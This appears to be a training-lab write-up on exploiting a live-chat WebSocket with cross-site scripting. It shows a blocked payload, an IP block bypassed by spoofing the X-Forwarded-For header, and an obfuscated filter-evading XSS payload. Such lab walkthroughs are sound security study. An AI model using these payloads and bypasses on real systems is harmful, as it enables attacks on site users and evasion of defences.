Manipulating the WebSocket handshake to exploit vulnerabilities

Description

This online shop has a live chat feature implemented using WebSockets.

It has an aggressive but flawed XSS filter.

To solve the lab, use a WebSocket message to trigger an alert() popup in the support agent's browser.

Approach

After accessing the lab, I enabled the FoxyProxy extension to intercept all requests through Burp Suite. Then, I used the live chat feature on the site and checked the WebSocket History in Burp's proxy, where I found my message being sent in this request:

{"message":"This is my first message"}

My goal was to trigger an alert pop-up in the support agent's browser using an XSS payload. I attempted a simple XSS injection:

{"message":"<img src=1 onerror=alert(1)>"}

However, when I sent this request, I received the following response:

{"error":"Attack detected: Event handler"}

Additionally, my IP was blocked, preventing further communication through this WebSocket. To bypass the IP block, I used the X-Forwarded-For header. I reconnected by pressing reconnect and adding this header to the request:

GET /chat HTTP/1.1
Host: 0a56006e0495981b8482d8ed00fa00ac.web-security-academy.net
X-Forwarded-For: 4.4.4.4
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Upgrade: websocket
Origin: https://0a56006e0495981b8482d8ed00fa00ac.web-security-academy.net
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=VwKkPu5lrx5w9wiHtK8GOWH1RQtAohhi
Sec-WebSocket-Key: 06gOIF/K3/BKQNG6e6MZFQ==

This tricked the server into thinking the request was coming from IP 4.4.4.4 instead of my blocked IP. After pressing connect, I successfully reconnected to the WebSocket.

To bypass the XSS filters, I used an obfuscated XSS payload:

<img src=0 oNeRrOr=alert`1`>

I sent this payload and re-accessed the live chat page, ensuring to add the X-Forwarded-For header each time. Upon doing this, I saw the alert box pop up, indicating the lab was solved. This alert also appeared in the support agent's browser, confirming the success of the XSS attack.

PreviousCross site WebSocket hijackingNextCross-site Request forgery (CSRF)